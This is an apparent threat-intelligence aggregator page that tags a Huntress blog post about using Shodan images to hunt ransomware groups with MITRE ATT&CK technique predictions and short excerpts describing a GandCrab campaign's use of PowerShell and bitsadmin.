TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Using Shodan Images to Hunt Down Ransomware Groups | Huntress

2022-12-20 · Read original ↗

ATT&CK techniques detected

9 predictions
T1486Data Encrypted for Impact
94%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. i will show how simplistic and opportunistic some of these attacks / attackers are and where we can hunt them in the wild. then you will be able to take this information and actively app…”
T1486Data Encrypted for Impact
93%
“here is a pitfall for ransomware groups where they end up spamming their payload at any poor device that will listen. those poor devices. gandcrab campaign powershell & bitsadmin gandcrab — also known as revil — has rebranded many times and has had many of its affiliates arrested…”
T1486Data Encrypted for Impact
85%
“quickly attribute the malware to the group by searching the. exe names and the ip addresses as we are looking at historical data ; thankfully it ' s for a mass campaign. searching the ip leads us to here https : / / urlhaus. abuse. ch / host / 92. 63. 197. 153 / which tells us th…”
T1585.002Email Accounts
76%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. i will show how simplistic and opportunistic some of these attacks / attackers are and where we can hunt them in the wild. then you will be able to take this information and actively app…”
T1080Taint Shared Content
41%
“here is a pitfall for ransomware groups where they end up spamming their payload at any poor device that will listen. those poor devices. gandcrab campaign powershell & bitsadmin gandcrab — also known as revil — has rebranded many times and has had many of its affiliates arrested…”
T1197BITS Jobs
41%
“i have taken an instance where the ransomware group tried to infect a pfsense router with powershell, bitsadmin and ftp, and not only was that not enough, but they did it again. color breakdown : red - first execution blue - commands and domains yellow - second execution green - …”
T1486Data Encrypted for Impact
39%
“000 potential paydays. cha - ching. however, one person cannot go through all of these alone, so this is where our threat actor turns to automation … and ultimately leads to their downfall. leveraging the ability of shodan images and combining them with the work of a ransomware a…”
T1080Taint Shared Content
35%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. i will show how simplistic and opportunistic some of these attacks / attackers are and where we can hunt them in the wild. then you will be able to take this information and actively app…”
T1486Data Encrypted for Impact
34%
“using shodan images to hunt down ransomware groups | huntress in a couple of blog posts, we ’ ll discuss how we leverage shodan. io to solve some security problems. in this blog, we ’ re going to focus on how shodan helps us unveil some of the infrastructure that supports ransomw…”

Summary

In this blog, we’re going to focus on how Shodan helps us unveil some of the infrastructure that supports ransomware actors.